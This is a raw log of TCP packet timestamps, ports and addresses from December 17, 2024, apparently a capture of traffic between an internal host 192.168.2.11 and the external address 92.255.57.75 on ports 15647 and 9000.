Dec 17, 2024 08:40:15.572999954 CET	9000	50047	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.573142052 CET	9000	50047	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.573240042 CET	50047	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.583338022 CET	50047	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.584273100 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.587440014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.587476969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.587580919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.587580919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.589983940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.592295885 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.601213932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.601345062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.637598038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.638046980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.639847994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.656548977 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.657839060 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.663954020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.664031982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.664062977 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.664107084 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.666538954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.666695118 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.683784008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.683895111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.693701982 CET	50048	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.701685905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.701704979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.701880932 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.703027010 CET	9000	50047	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.708112001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.708184958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.708208084 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.721128941 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.721224070 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.739418030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.757488012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.757931948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.757975101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.758316994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.777766943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.777836084 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.783230066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.783257961 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.783335924 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.786479950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.790791035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.790999889 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.813560009 CET	9000	50048	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.813640118 CET	50048	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.814512014 CET	50048	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.821664095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.822052956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.830280066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.830704927 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.859253883 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.859370947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.872154951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.872231960 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.872287989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.872395992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.874744892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.874789000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.897641897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.897744894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.899727106 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.904252052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.907824993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.932485104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.934242010 CET	9000	50048	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.941735029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.943253040 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.965635061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.975372076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.975445986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.976125002 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.976195097 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:15.976330996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.992281914 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.992615938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.992724895 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:15.992832899 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.027638912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.027846098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.033214092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.033310890 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.033319950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.052347898 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.056015015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.072360039 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.072443962 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.072464943 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.085496902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.089845896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.089931011 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.091362000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.095216036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.095850945 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.095856905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.099895954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.102850914 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.103943110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.121887922 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.133965969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.136003017 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.153068066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.153211117 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.168210983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.168353081 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.174218893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.174329996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.174494028 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.174494028 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.176822901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.176930904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.192106009 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.192958117 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.193012953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.193097115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.211119890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.212007999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.219614983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.219855070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.219877005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.223864079 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.241724968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.242347002 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.244543076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.247987032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.273030996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.273583889 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.277601004 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.277801991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.294292927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.294455051 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.304676056 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.304755926 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.331775904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.332463026 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.339690924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.339863062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.362474918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.362611055 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.366837978 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.367117882 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.378192902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.378248930 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.378314972 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.397543907 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.397726059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.401976109 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.402137041 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.410062075 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.410140991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.410177946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.415894032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.419819117 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.435350895 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.435641050 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.456845999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.459938049 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.460235119 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.476432085 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.481708050 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.481857061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.487359047 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.487525940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.498931885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.498974085 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.499141932 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.522075891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.522272110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.530775070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.530881882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.530908108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.531193972 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.533447981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.533546925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.535828114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.555599928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.555752039 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.555979013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.557686090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.557720900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.557780981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.576702118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.576884985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.588416100 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.588562012 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.588707924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.596545935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.596640110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.607472897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.607774019 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.619642019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.619678020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.619838953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.650496960 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.650733948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.651949883 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.652252913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.674710035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.674879074 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.678118944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.678245068 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.678303957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.678303957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.708352089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.708460093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.709220886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.709286928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.709407091 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.709558010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.727653027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.727853060 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.747853994 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.748627901 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.770483017 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.771847963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.780014992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.780514956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.798844099 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.799499989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.799597025 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.818907976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.834383011 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.834532976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.845966101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.845985889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.846132040 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.865780115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.866908073 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.867847919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.889309883 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.891700029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.892297983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.892363071 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.892436981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.900542974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.901153088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.917072058 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.917174101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.917464018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.918992043 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.919218063 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.919595003 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.938678026 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.938854933 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.961060047 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.964164972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.964181900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.964380026 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.985614061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.986043930 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:16.990850925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:16.990859985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.009424925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.011332035 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.020433903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.023768902 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.037308931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.037508965 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.040007114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.040069103 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.040102005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.040163994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.062196970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.080791950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.080821037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.083827019 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.084121943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.084794044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.086607933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.086719036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.087331057 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.092327118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.095882893 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.113617897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.131309986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.131758928 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.140012026 CET	9000	50048	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.140239954 CET	9000	50048	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.140305996 CET	50048	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.140886068 CET	50048	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.146573067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.147252083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.159904003 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.160034895 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.182049990 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.182332993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.182425976 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.182506084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.182571888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.185782909 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.185833931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.185862064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.200612068 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.200860023 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.207433939 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.207515001 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.207787037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.207927942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.208092928 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.233369112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.234286070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.234297991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.234462976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.252927065 CET	50049	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.255101919 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.255227089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.255331993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.260629892 CET	9000	50048	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.279942036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.280606031 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.282689095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.282799006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.283330917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.303765059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.305727959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.308374882 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.308418036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.308487892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.308891058 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.327296972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.328223944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.328257084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.328283072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.328283072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.329133987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.354908943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.354928970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.355082989 CET	50034	15647	192.168.2.11	92.255.57.75
